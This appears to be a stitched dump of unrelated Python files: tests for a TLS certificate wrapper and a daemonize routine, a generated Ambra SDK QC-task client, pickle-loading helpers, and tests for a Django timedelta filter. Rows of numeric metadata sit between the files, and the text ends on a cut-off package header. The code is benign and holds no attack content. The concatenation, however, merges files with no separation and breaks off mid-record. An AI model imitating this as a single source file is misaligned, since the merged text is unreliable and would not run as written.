    def test_missing_certfile(self, mock_TendrilPartial, mock_SafeConfigParser,
                              mock_expanduser):
        # certfile absent from the profile.
        cp = mock_SafeConfigParser.return_value
        self.assertRaises(util.CertException, util.cert_wrapper, None, 'test')
        mock_expanduser.assert_called_once_with('~/.heyu.cert')
        mock_SafeConfigParser.assert_called_once_with()
        cp.read.assert_called_once_with('/home/dir/.heyu.cert')
        cp.items.assert_called_once_with('test')
        self.assertFalse(mock_TendrilPartial.called)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': ['/home/dir/.heyu.cert'],
        'items.return_value': [
            ('cafile', 'ca'),
            ('keyfile', 'key'),
            ('certfile', 'cert'),
        ],
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_basic(self, mock_TendrilPartial, mock_SafeConfigParser,
                   mock_expanduser):
        # Happy path, client side: TLS wrapper built with cert_reqs
        # REQUIRED and server_side=False.
        cp = mock_SafeConfigParser.return_value
        result = util.cert_wrapper(None, 'test')
        self.assertEqual(result, 'wrapper')
        mock_expanduser.assert_called_once_with('~/.heyu.cert')
        mock_SafeConfigParser.assert_called_once_with()
        cp.read.assert_called_once_with('/home/dir/.heyu.cert')
        cp.items.assert_called_once_with('test')
        mock_TendrilPartial.assert_called_once_with(
            ssl.wrap_socket, keyfile='key', certfile='cert', ca_certs='ca',
            server_side=False, cert_reqs=ssl.CERT_REQUIRED,
            ssl_version=ssl.PROTOCOL_TLSv1)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': ['/home/dir/.heyu.cert'],
        'items.return_value': [
            ('cafile', 'ca'),
            ('keyfile', 'key'),
            ('certfile', 'cert'),
        ],
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_server(self, mock_TendrilPartial, mock_SafeConfigParser,
                    mock_expanduser):
        # Third positional argument flips server_side to True.
        cp = mock_SafeConfigParser.return_value
        result = util.cert_wrapper(None, 'test', True)
        self.assertEqual(result, 'wrapper')
        mock_expanduser.assert_called_once_with('~/.heyu.cert')
        mock_SafeConfigParser.assert_called_once_with()
        cp.read.assert_called_once_with('/home/dir/.heyu.cert')
        cp.items.assert_called_once_with('test')
        mock_TendrilPartial.assert_called_once_with(
            ssl.wrap_socket, keyfile='key', certfile='cert', ca_certs='ca',
            server_side=True, cert_reqs=ssl.CERT_REQUIRED,
            ssl_version=ssl.PROTOCOL_TLSv1)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': ['/home/dir/.heyu.cert'],
        'items.return_value': [
            ('cafile', 'ca'),
            ('keyfile', 'key'),
            ('certfile', 'cert'),
        ],
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_alt_conf(self, mock_TendrilPartial, mock_SafeConfigParser,
                      mock_expanduser):
        # An explicit config path replaces the ~/.heyu.cert default.
        cp = mock_SafeConfigParser.return_value
        result = util.cert_wrapper('alt_conf', 'test')
        self.assertEqual(result, 'wrapper')
        mock_expanduser.assert_called_once_with('alt_conf')
        mock_SafeConfigParser.assert_called_once_with()
        cp.read.assert_called_once_with('/home/dir/.heyu.cert')
        cp.items.assert_called_once_with('test')
        mock_TendrilPartial.assert_called_once_with(
            ssl.wrap_socket, keyfile='key', certfile='cert', ca_certs='ca',
            server_side=False, cert_reqs=ssl.CERT_REQUIRED,
            ssl_version=ssl.PROTOCOL_TLSv1)

    @mock.patch('os.path.expanduser', return_value='/home/dir/.heyu.cert')
    @mock.patch('ConfigParser.SafeConfigParser', return_value=mock.Mock(**{
        'read.return_value': ['/home/dir/.heyu.cert'],
        'items.return_value': [
            ('cafile', 'ca'),
            ('keyfile', 'key'),
            ('certfile', 'cert'),
        ],
    }))
    @mock.patch('tendril.TendrilPartial', return_value='wrapper')
    def test_alt_profile(self, mock_TendrilPartial, mock_SafeConfigParser,
                         mock_expanduser):
        # "path[profile]" selects a profile section other than the default.
        cp = mock_SafeConfigParser.return_value
        result = util.cert_wrapper('alt_conf[alt_profile]', 'test')
        self.assertEqual(result, 'wrapper')
        mock_expanduser.assert_called_once_with('alt_conf')
        mock_SafeConfigParser.assert_called_once_with()
        cp.read.assert_called_once_with('/home/dir/.heyu.cert')
        cp.items.assert_called_once_with('alt_profile')
        mock_TendrilPartial.assert_called_once_with(
            ssl.wrap_socket, keyfile='key', certfile='cert', ca_certs='ca',
            server_side=False, cert_reqs=ssl.CERT_REQUIRED,
            ssl_version=ssl.PROTOCOL_TLSv1)
class MyBytesIO(io.BytesIO):
    """An in-memory stream whose final contents survive close().

    Code under test closes the file it writes; close() therefore
    snapshots the buffer into ``contents`` so assertions can still
    inspect what was emitted.
    """

    def close(self):
        # getvalue() must run before close() releases the buffer.
        final_data = self.getvalue()
        self.contents = final_data
        super(MyBytesIO, self).close()
class DaemonizeTest(unittest.TestCase):
    """Tests for util.daemonize().

    Every OS primitive involved in the classic double-fork
    daemonization sequence (fork/setsid/umask/chdir/dup2, plus the
    optional PID-file write) is mocked, so the test process itself
    never forks or touches real file descriptors.
    """

    @mock.patch('os.chdir')
    @mock.patch('os.umask')
    @mock.patch('os.fork', return_value=0)
    @mock.patch('os._exit')
    @mock.patch('os.setsid')
    @mock.patch('os.open', return_value=3)
    @mock.patch('os.dup2')
    @mock.patch('os.close')
    @mock.patch('os.getpid', return_value=1234)
    @mock.patch('__builtin__.open', return_value=MyBytesIO())
    @mock.patch('sys.stdin', mock.Mock(**{'fileno.return_value': 0}))
    @mock.patch('sys.stdout', mock.Mock(**{'fileno.return_value': 1}))
    @mock.patch('sys.stderr', mock.Mock(**{'fileno.return_value': 2}))
    def test_child_basic(self, mock_open, mock_getpid, mock_close, mock_dup2,
                         mock_os_open, mock_setsid, mock_exit, mock_fork,
                         mock_umask, mock_chdir):
        # fork() returns 0 (child path) both times: no _exit(), the
        # std streams are redirected to /dev/null (fd 3) and fd 3 is
        # closed afterwards.  No pidfile argument, so no PID is written.
        util.daemonize()
        mock_chdir.assert_called_once_with('/')
        mock_umask.assert_called_once_with(0)
        mock_fork.assert_has_calls([mock.call(), mock.call()])
        self.assertFalse(mock_exit.called)
        mock_setsid.assert_called_once_with()
        mock_os_open.assert_called_once_with(os.devnull, os.O_RDWR)
        mock_dup2.assert_has_calls([
            mock.call(3, 0),
            mock.call(3, 1),
            mock.call(3, 2),
        ])
        mock_close.assert_called_once_with(3)
        self.assertFalse(mock_getpid.called)
        self.assertFalse(mock_open.called)

    @mock.patch('os.chdir')
    @mock.patch('os.umask')
    @mock.patch('os.fork', return_value=1234)
    @mock.patch('os._exit')
    @mock.patch('os.setsid')
    @mock.patch('os.open', return_value=3)
    @mock.patch('os.dup2')
    @mock.patch('os.close')
    @mock.patch('os.getpid', return_value=1234)
    @mock.patch('__builtin__.open', return_value=MyBytesIO())
    @mock.patch('sys.stdin', mock.Mock(**{'fileno.return_value': 0}))
    @mock.patch('sys.stdout', mock.Mock(**{'fileno.return_value': 1}))
    @mock.patch('sys.stderr', mock.Mock(**{'fileno.return_value': 2}))
    def test_parent_basic(self, mock_open, mock_getpid, mock_close, mock_dup2,
                          mock_os_open, mock_setsid, mock_exit, mock_fork,
                          mock_umask, mock_chdir):
        # fork() returns a child PID (parent path) both times: the
        # parent is expected to call os._exit(0) after each fork.
        # Since the mocked _exit does not actually terminate, the rest
        # of the sequence still runs and is asserted as in the child.
        util.daemonize()
        mock_chdir.assert_called_once_with('/')
        mock_umask.assert_called_once_with(0)
        mock_fork.assert_has_calls([mock.call(), mock.call()])
        mock_exit.assert_has_calls([mock.call(0), mock.call(0)])
        mock_setsid.assert_called_once_with()
        mock_os_open.assert_called_once_with(os.devnull, os.O_RDWR)
        mock_dup2.assert_has_calls([
            mock.call(3, 0),
            mock.call(3, 1),
            mock.call(3, 2),
        ])
        mock_close.assert_called_once_with(3)
        self.assertFalse(mock_getpid.called)
        self.assertFalse(mock_open.called)

    @mock.patch('os.chdir')
    @mock.patch('os.umask')
    @mock.patch('os.fork', return_value=0)
    @mock.patch('os._exit')
    @mock.patch('os.setsid')
    @mock.patch('os.open', return_value=0)
    @mock.patch('os.dup2')
    @mock.patch('os.close')
    @mock.patch('os.getpid', return_value=1234)
    @mock.patch('__builtin__.open', return_value=MyBytesIO())
    @mock.patch('sys.stdin', mock.Mock(**{'fileno.return_value': 0}))
    @mock.patch('sys.stdout', mock.Mock(**{'fileno.return_value': 1}))
    @mock.patch('sys.stderr', mock.Mock(**{'fileno.return_value': 2}))
    def test_devnull0(self, mock_open, mock_getpid, mock_close, mock_dup2,
                      mock_os_open, mock_setsid, mock_exit, mock_fork,
                      mock_umask, mock_chdir):
        # /dev/null opened as fd 0 (a std descriptor): it must not be
        # closed after the dup2() calls, since that would close stdin.
        util.daemonize()
        mock_chdir.assert_called_once_with('/')
        mock_umask.assert_called_once_with(0)
        mock_fork.assert_has_calls([mock.call(), mock.call()])
        self.assertFalse(mock_exit.called)
        mock_setsid.assert_called_once_with()
        mock_os_open.assert_called_once_with(os.devnull, os.O_RDWR)
        mock_dup2.assert_has_calls([
            mock.call(0, 0),
            mock.call(0, 1),
            mock.call(0, 2),
        ])
        self.assertFalse(mock_close.called)
        self.assertFalse(mock_getpid.called)
        self.assertFalse(mock_open.called)

    @mock.patch('os.chdir')
    @mock.patch('os.umask')
    @mock.patch('os.fork', return_value=0)
    @mock.patch('os._exit')
    @mock.patch('os.setsid')
    @mock.patch('os.open', return_value=3)
    @mock.patch('os.dup2')
    @mock.patch('os.close')
    @mock.patch('os.getpid', return_value=1234)
    @mock.patch('__builtin__.open', return_value=MyBytesIO())
    @mock.patch('sys.stdin', mock.Mock(**{'fileno.return_value': 0}))
    @mock.patch('sys.stdout', mock.Mock(**{'fileno.return_value': 1}))
    @mock.patch('sys.stderr', mock.Mock(**{'fileno.return_value': 2}))
    def test_alt_workdir(self, mock_open, mock_getpid, mock_close, mock_dup2,
                         mock_os_open, mock_setsid, mock_exit, mock_fork,
                         mock_umask, mock_chdir):
        # The workdir keyword overrides the default chdir('/').
        util.daemonize(workdir='/work/dir')
        mock_chdir.assert_called_once_with('/work/dir')
        mock_umask.assert_called_once_with(0)
        mock_fork.assert_has_calls([mock.call(), mock.call()])
        self.assertFalse(mock_exit.called)
        mock_setsid.assert_called_once_with()
        mock_os_open.assert_called_once_with(os.devnull, os.O_RDWR)
        mock_dup2.assert_has_calls([
            mock.call(3, 0),
            mock.call(3, 1),
            mock.call(3, 2),
        ])
        mock_close.assert_called_once_with(3)
        self.assertFalse(mock_getpid.called)
        self.assertFalse(mock_open.called)

    @mock.patch('os.chdir')
    @mock.patch('os.umask')
    @mock.patch('os.fork', return_value=0)
    @mock.patch('os._exit')
    @mock.patch('os.setsid')
    @mock.patch('os.open', return_value=3)
    @mock.patch('os.dup2')
    @mock.patch('os.close')
    @mock.patch('os.getpid', return_value=1234)
    @mock.patch('__builtin__.open', return_value=MyBytesIO())
    @mock.patch('sys.stdin', mock.Mock(**{'fileno.return_value': 0}))
    @mock.patch('sys.stdout', mock.Mock(**{'fileno.return_value': 1}))
    @mock.patch('sys.stderr', mock.Mock(**{'fileno.return_value': 2}))
    def test_with_pidfile(self, mock_open, mock_getpid, mock_close, mock_dup2,
                          mock_os_open, mock_setsid, mock_exit, mock_fork,
                          mock_umask, mock_chdir):
        # With a pidfile argument the daemon PID is written to the file;
        # MyBytesIO preserves the written contents across close().
        util.daemonize(pidfile='/some/file.pid')
        mock_chdir.assert_called_once_with('/')
        mock_umask.assert_called_once_with(0)
        mock_fork.assert_has_calls([mock.call(), mock.call()])
        self.assertFalse(mock_exit.called)
        mock_setsid.assert_called_once_with()
        mock_os_open.assert_called_once_with(os.devnull, os.O_RDWR)
        mock_dup2.assert_has_calls([
            mock.call(3, 0),
            mock.call(3, 1),
            mock.call(3, 2),
        ])
        mock_close.assert_called_once_with(3)
        mock_getpid.assert_called_once_with()
        mock_open.assert_called_once_with('/some/file.pid', 'w')
        self.assertEqual(mock_open.return_value.contents, '1234\n')
| 44.022071
| 79
| 0.652397
| 3,223
| 25,929
| 4.98852
| 0.06857
| 0.068852
| 0.082597
| 0.103247
| 0.902724
| 0.899055
| 0.889601
| 0.886118
| 0.877037
| 0.862048
| 0
| 0.013831
| 0.202515
| 25,929
| 588
| 80
| 44.096939
| 0.76371
| 0.024953
| 0
| 0.762677
| 0
| 0
| 0.162119
| 0.025066
| 0
| 0
| 0
| 0
| 0.324544
| 1
| 0.068966
| false
| 0.002028
| 0.016227
| 0
| 0.099391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5cf231d4b0ca26fc47ab7bbb62f3eb2c00b539d6
| 11,550
|
py
|
Python
|
ambra_sdk/service/entrypoints/generated/qctask.py
|
dicomgrid/sdk-python
|
bb12eed311bad73dfb863917df4dc5cbcd91a447
|
[
"Apache-2.0"
] | 9
|
2020-04-20T23:45:44.000Z
|
2021-04-18T11:22:17.000Z
|
ambra_sdk/service/entrypoints/generated/qctask.py
|
dicomgrid/sdk-python
|
bb12eed311bad73dfb863917df4dc5cbcd91a447
|
[
"Apache-2.0"
] | 13
|
2020-02-08T16:15:05.000Z
|
2021-09-13T22:55:28.000Z
|
ambra_sdk/service/entrypoints/generated/qctask.py
|
dicomgrid/sdk-python
|
bb12eed311bad73dfb863917df4dc5cbcd91a447
|
[
"Apache-2.0"
] | 6
|
2020-03-25T17:47:45.000Z
|
2021-04-18T11:22:19.000Z
|
""" Qctask.
Do not edit this file by hand.
This is generated by parsing api.html service doc.
"""
from ambra_sdk.exceptions.service import InvalidInteger
from ambra_sdk.exceptions.service import InvisibleQuery
from ambra_sdk.exceptions.service import MissingFields
from ambra_sdk.exceptions.service import NamespaceNotAccountRelated
from ambra_sdk.exceptions.service import NotFound
from ambra_sdk.exceptions.service import NotOwningNamespace
from ambra_sdk.exceptions.service import NotPermitted
from ambra_sdk.service.query import QueryO
from ambra_sdk.service.query import AsyncQueryO
class Qctask:
    """Synchronous query builders for the /qctask service endpoints."""

    def __init__(self, api):
        # Api object the built queries will execute against.
        self._api = api

    def add(
        self,
        namespace_id,
        customfield_param=None,
        message=None,
        priority=None,
        query_id=None,
        studies=None,
        user_id=None,
    ):
        """Add.

        :param namespace_id: Id of the namespace assigned to the QC Task
        :param customfield_param: Custom field(s) (optional)
        :param message: Explanatory message for the QC Task (optional)
        :param priority: QC Task priority (optional)
        :param query_id: Id of the query to associate the QC Task to (optional)
        :param studies: A JSON array of the study uuid(s) (optional)
        :param user_id: Id of the user to assign the QC Task to (optional)
        """
        request_data = {
            'message': message,
            'namespace_id': namespace_id,
            'priority': priority,
            'query_id': query_id,
            'studies': studies,
            'user_id': user_id,
        }
        if customfield_param is not None:
            # Custom fields travel as individual "customfield-<name>" keys.
            request_data.update({
                '{prefix}{k}'.format(prefix='customfield-', k=k): v
                for k, v in customfield_param.items()
            })
        errors_mapping = {
            ('INVALID_INTEGER', None): InvalidInteger('An invalid integer was passed. The error_subtype holds the name of the invalid integer'),
            ('INVISIBLE_QUERY', None): InvisibleQuery('The passed Query is not visible to the user the QC Task is being assigned to'),
            ('MISSING_FIELDS', None): MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields'),
            ('NAMESPACE_NOT_ACCOUNT_RELATED', None): NamespaceNotAccountRelated('The assigned namespace is not associated with an Account (it is a PHR account)'),
            ('NOT_FOUND', None): NotFound('The object was not found. The error_subtype holds the type of object not found'),
            ('NOT_OWNING_NAMESPACE', None): NotOwningNamespace('The assigned namespace is not an owning namespace for the passed Query'),
            ('NOT_PERMITTED', None): NotPermitted('You are not permitted to assign a QC Task to the namespace'),
        }
        return QueryO(
            api=self._api,
            url='/qctask/add',
            request_data=request_data,
            errors_mapping=errors_mapping,
            required_sid=True,
        )

    def set(
        self,
        uuid,
        customfield_param=None,
        message=None,
        priority=None,
        studies=None,
        user_id=None,
    ):
        """Set.

        :param uuid: The QC Task uuid
        :param customfield_param: Custom field(s) (optional)
        :param message: Explanatory message for the QC Task (optional)
        :param priority: QC Task priority (optional)
        :param studies: A JSON array of the study uuid(s) (optional)
        :param user_id: Id of the user to assign the QC Task to (optional)
        """
        request_data = {
            'message': message,
            'priority': priority,
            'studies': studies,
            'user_id': user_id,
            'uuid': uuid,
        }
        if customfield_param is not None:
            # Custom fields travel as individual "customfield-<name>" keys.
            request_data.update({
                '{prefix}{k}'.format(prefix='customfield-', k=k): v
                for k, v in customfield_param.items()
            })
        errors_mapping = {
            ('INVALID_INTEGER', None): InvalidInteger('An invalid integer was passed. The error_subtype holds the name of the invalid integer'),
            ('INVISIBLE_QUERY', None): InvisibleQuery('The passed Query is not visible to the user the QC Task is being assigned to'),
            ('MISSING_FIELDS', None): MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields'),
            ('NOT_FOUND', None): NotFound('The object was not found. The error_subtype holds the type of object not found'),
            ('NOT_PERMITTED', None): NotPermitted('You are not permitted to edit the QC Task'),
        }
        return QueryO(
            api=self._api,
            url='/qctask/set',
            request_data=request_data,
            errors_mapping=errors_mapping,
            required_sid=True,
        )

    def get(
        self,
        uuid,
    ):
        """Get.

        :param uuid: The QC Task uuid
        """
        request_data = {
            'uuid': uuid,
        }
        errors_mapping = {
            ('MISSING_FIELDS', None): MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields'),
            ('NOT_FOUND', None): NotFound('The QC Task can not be found'),
            ('NOT_PERMITTED', None): NotPermitted('You are not permitted to view the QC Task'),
        }
        return QueryO(
            api=self._api,
            url='/qctask/get',
            request_data=request_data,
            errors_mapping=errors_mapping,
            required_sid=True,
        )
class AsyncQctask:
    """Asynchronous query builders for the /qctask service endpoints."""

    def __init__(self, api):
        # Api object the built queries will execute against.
        self._api = api

    def add(
        self,
        namespace_id,
        customfield_param=None,
        message=None,
        priority=None,
        query_id=None,
        studies=None,
        user_id=None,
    ):
        """Add.

        :param namespace_id: Id of the namespace assigned to the QC Task
        :param customfield_param: Custom field(s) (optional)
        :param message: Explanatory message for the QC Task (optional)
        :param priority: QC Task priority (optional)
        :param query_id: Id of the query to associate the QC Task to (optional)
        :param studies: A JSON array of the study uuid(s) (optional)
        :param user_id: Id of the user to assign the QC Task to (optional)
        """
        request_data = {
            'message': message,
            'namespace_id': namespace_id,
            'priority': priority,
            'query_id': query_id,
            'studies': studies,
            'user_id': user_id,
        }
        if customfield_param is not None:
            # Custom fields travel as individual "customfield-<name>" keys.
            request_data.update({
                '{prefix}{k}'.format(prefix='customfield-', k=k): v
                for k, v in customfield_param.items()
            })
        errors_mapping = {
            ('INVALID_INTEGER', None): InvalidInteger('An invalid integer was passed. The error_subtype holds the name of the invalid integer'),
            ('INVISIBLE_QUERY', None): InvisibleQuery('The passed Query is not visible to the user the QC Task is being assigned to'),
            ('MISSING_FIELDS', None): MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields'),
            ('NAMESPACE_NOT_ACCOUNT_RELATED', None): NamespaceNotAccountRelated('The assigned namespace is not associated with an Account (it is a PHR account)'),
            ('NOT_FOUND', None): NotFound('The object was not found. The error_subtype holds the type of object not found'),
            ('NOT_OWNING_NAMESPACE', None): NotOwningNamespace('The assigned namespace is not an owning namespace for the passed Query'),
            ('NOT_PERMITTED', None): NotPermitted('You are not permitted to assign a QC Task to the namespace'),
        }
        return AsyncQueryO(
            api=self._api,
            url='/qctask/add',
            request_data=request_data,
            errors_mapping=errors_mapping,
            required_sid=True,
        )

    def set(
        self,
        uuid,
        customfield_param=None,
        message=None,
        priority=None,
        studies=None,
        user_id=None,
    ):
        """Set.

        :param uuid: The QC Task uuid
        :param customfield_param: Custom field(s) (optional)
        :param message: Explanatory message for the QC Task (optional)
        :param priority: QC Task priority (optional)
        :param studies: A JSON array of the study uuid(s) (optional)
        :param user_id: Id of the user to assign the QC Task to (optional)
        """
        request_data = {
            'message': message,
            'priority': priority,
            'studies': studies,
            'user_id': user_id,
            'uuid': uuid,
        }
        if customfield_param is not None:
            # Custom fields travel as individual "customfield-<name>" keys.
            request_data.update({
                '{prefix}{k}'.format(prefix='customfield-', k=k): v
                for k, v in customfield_param.items()
            })
        errors_mapping = {
            ('INVALID_INTEGER', None): InvalidInteger('An invalid integer was passed. The error_subtype holds the name of the invalid integer'),
            ('INVISIBLE_QUERY', None): InvisibleQuery('The passed Query is not visible to the user the QC Task is being assigned to'),
            ('MISSING_FIELDS', None): MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields'),
            ('NOT_FOUND', None): NotFound('The object was not found. The error_subtype holds the type of object not found'),
            ('NOT_PERMITTED', None): NotPermitted('You are not permitted to edit the QC Task'),
        }
        return AsyncQueryO(
            api=self._api,
            url='/qctask/set',
            request_data=request_data,
            errors_mapping=errors_mapping,
            required_sid=True,
        )

    def get(
        self,
        uuid,
    ):
        """Get.

        :param uuid: The QC Task uuid
        """
        request_data = {
            'uuid': uuid,
        }
        errors_mapping = {
            ('MISSING_FIELDS', None): MissingFields('A required field is missing or does not have data in it. The error_subtype holds a array of all the missing fields'),
            ('NOT_FOUND', None): NotFound('The QC Task can not be found'),
            ('NOT_PERMITTED', None): NotPermitted('You are not permitted to view the QC Task'),
        }
        return AsyncQueryO(
            api=self._api,
            url='/qctask/get',
            request_data=request_data,
            errors_mapping=errors_mapping,
            required_sid=True,
        )
| 44.252874
| 182
| 0.631255
| 1,430
| 11,550
| 4.93986
| 0.082517
| 0.088335
| 0.033126
| 0.039638
| 0.966591
| 0.966591
| 0.923415
| 0.923415
| 0.923415
| 0.923415
| 0
| 0
| 0.27368
| 11,550
| 261
| 183
| 44.252874
| 0.842055
| 0.146407
| 0
| 0.880829
| 1
| 0.031088
| 0.346549
| 0.006083
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041451
| false
| 0.051813
| 0.046632
| 0
| 0.129534
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
cf132892ff4a22f601b2201ba52c03beff6da0b9
| 795
|
py
|
Python
|
pseudo_mask/tools/read_info.py
|
alisure-fork/CONTA
|
dde3e5083f45598d859dde889de3ae85c7a416e9
|
[
"MIT"
] | null | null | null |
pseudo_mask/tools/read_info.py
|
alisure-fork/CONTA
|
dde3e5083f45598d859dde889de3ae85c7a416e9
|
[
"MIT"
] | null | null | null |
pseudo_mask/tools/read_info.py
|
alisure-fork/CONTA
|
dde3e5083f45598d859dde889de3ae85c7a416e9
|
[
"MIT"
] | null | null | null |
import os
from alisuretool.Tools import Tools
def _read_info_pkl(image_info_root, file_name):
    """Load one image-info pickle from <image_info_root>/deal/<file_name>."""
    image_info_path = os.path.join(image_info_root, "deal", file_name)
    return Tools.read_from_pkl(image_info_path)


def read_image_info(image_info_root):
    """Return the image-info list from image_info_list_change_person2.pkl."""
    return _read_info_pkl(image_info_root, "image_info_list_change_person2.pkl")


def read_image_info_test(image_info_root):
    """Return the image-info list from image_info_list_test_for_conta.pkl."""
    return _read_info_pkl(image_info_root, "image_info_list_test_for_conta.pkl")


def read_image_info_val(image_info_root):
    """Return the image-info list from image_info_list_val_for_conta.pkl."""
    return _read_info_pkl(image_info_root, "image_info_list_val_for_conta.pkl")
| 34.565217
| 97
| 0.798742
| 133
| 795
| 4.24812
| 0.172932
| 0.414159
| 0.230089
| 0.127434
| 0.849558
| 0.849558
| 0.849558
| 0.849558
| 0.849558
| 0.849558
| 0
| 0.005698
| 0.116981
| 795
| 22
| 98
| 36.136364
| 0.799145
| 0.07673
| 0
| 0.428571
| 0
| 0
| 0.154583
| 0.138167
| 0
| 0
| 0
| 0
| 0
| 1
| 0.214286
| false
| 0
| 0.142857
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
cf1cf5c58dbed2e6d448a79246f6b3e38ba3f512
| 12,000
|
py
|
Python
|
timedeltatemplatefilter/tests/tests.py
|
frnhr/django_timedeltatemplatefilter
|
d22c2a564b4ccbdc7443ff6928fdf7224ac0a01f
|
[
"Unlicense"
] | 12
|
2016-01-24T02:38:54.000Z
|
2020-10-06T03:25:34.000Z
|
timedeltatemplatefilter/tests/tests.py
|
frnhr/django_timedeltatemplatefilter
|
d22c2a564b4ccbdc7443ff6928fdf7224ac0a01f
|
[
"Unlicense"
] | 4
|
2017-02-07T18:18:50.000Z
|
2019-11-17T17:29:30.000Z
|
timedeltatemplatefilter/tests/tests.py
|
frnhr/django_timedeltatemplatefilter
|
d22c2a564b4ccbdc7443ff6928fdf7224ac0a01f
|
[
"Unlicense"
] | 2
|
2017-02-07T18:33:45.000Z
|
2018-09-17T00:32:13.000Z
|
from datetime import timedelta
from django.test import TestCase
from timedeltatemplatefilter.templatetags.timedelta_filter import timedelta as the_filter
class SimpleTestCase(TestCase):
    """Exercises the `timedelta` template filter against fixed durations.

    Each test feeds one known timedelta through every supported format
    placeholder and compares the rendered string against a hand-computed
    expected value.
    """

    # Placeholder names, in the exact order the assertions are made.
    _FORMAT_KEYS = (
        'seconds', 'seconds_total', 'seconds2',
        'minutes', 'minutes_total', 'minutes2',
        'hours', 'hours_total', 'hours2',
        'days', 'days_total',
        'years', 'years_total',
    )

    def _check(self, value, expected):
        """Assert the filter renders `value` as `expected` for every key."""
        for key, wanted in zip(self._FORMAT_KEYS, expected):
            self.assertEqual(the_filter(value, '{' + key + '}'), wanted)

    def test_seconds_only_2(self):
        self._check(timedelta(seconds=2),
                    ('2', '2', '02',
                     '0', '0', '00',
                     '0', '0', '00',
                     '0', '0',
                     '0', '0'))

    def test_seconds_only_42(self):
        self._check(timedelta(seconds=42),
                    ('42', '42', '42',
                     '0', '0', '00',
                     '0', '0', '00',
                     '0', '0',
                     '0', '0'))

    def test_minutes_only_3(self):
        self._check(timedelta(seconds=3 * 60),
                    ('0', '180', '00',
                     '3', '3', '03',
                     '0', '0', '00',
                     '0', '0',
                     '0', '0'))

    def test_minutes_only_32(self):
        self._check(timedelta(seconds=32 * 60),
                    ('0', '1920', '00',
                     '32', '32', '32',
                     '0', '0', '00',
                     '0', '0',
                     '0', '0'))

    def test_hounrs_only_7(self):
        # NOTE: misspelled method name kept — renaming would change the
        # class's public interface.
        self._check(timedelta(seconds=7 * 3600),
                    ('0', '25200', '00',
                     '0', '420', '00',
                     '7', '7', '07',
                     '0', '0',
                     '0', '0'))

    def test_hours_only_17(self):
        self._check(timedelta(seconds=17 * 3600),
                    ('0', '61200', '00',
                     '0', '1020', '00',
                     '17', '17', '17',
                     '0', '0',
                     '0', '0'))

    def test_days_only_4(self):
        self._check(timedelta(days=4),
                    ('0', '345600', '00',
                     '0', '5760', '00',
                     '0', '96', '00',
                     '4', '4',
                     '0', '0'))

    def test_days_only_74(self):
        self._check(timedelta(days=74),
                    ('0', '6393600', '00',
                     '0', '106560', '00',
                     '0', '1776', '00',
                     '74', '74',
                     '0', '0'))

    def test_years_only_10(self):
        self._check(timedelta(days=10 * 365),
                    ('0', '315360000', '00',
                     '0', '5256000', '00',
                     '0', '87600', '00',
                     '0', '3650',
                     '10', '10'))

    def test_random_1(self):
        self._check(timedelta(days=12345, seconds=28221),
                    ('21', '1066636221', '21',
                     '50', '17777270', '50',
                     '7', '296287', '07',
                     '300', '12345',
                     '33', '33'))

    def test_random_2(self):
        self._check(timedelta(seconds=347979675),
                    ('15', '347979675', '15',
                     '1', '5799661', '01',
                     '13', '96661', '13',
                     '12', '4027',
                     '11', '11'))

    def test_random_3(self):
        self._check(timedelta(seconds=347980455),
                    ('15', '347980455', '15',
                     '14', '5799674', '14',
                     '13', '96661', '13',
                     '12', '4027',
                     '11', '11'))
| 60.301508
| 89
| 0.66
| 1,466
| 12,000
| 5.116644
| 0.057981
| 0.201573
| 0.37435
| 0.499133
| 0.941608
| 0.914278
| 0.899213
| 0.820024
| 0.746834
| 0.722837
| 0
| 0.045595
| 0.162917
| 12,000
| 198
| 90
| 60.606061
| 0.701145
| 0
| 0
| 0.538043
| 0
| 0
| 0.163
| 0
| 0
| 0
| 0
| 0
| 0.847826
| 1
| 0.065217
| false
| 0
| 0.016304
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
cf2d96ca915be7706318f2a9bdabb28ec428dcd8
| 58
|
py
|
Python
|
locker/__init__.py
|
Coal0/Locker
|
ac2b2052df56350bcd0af3aaa60ef96de19257eb
|
[
"MIT"
] | 1
|
2017-09-13T07:16:35.000Z
|
2017-09-13T07:16:35.000Z
|
locker/__init__.py
|
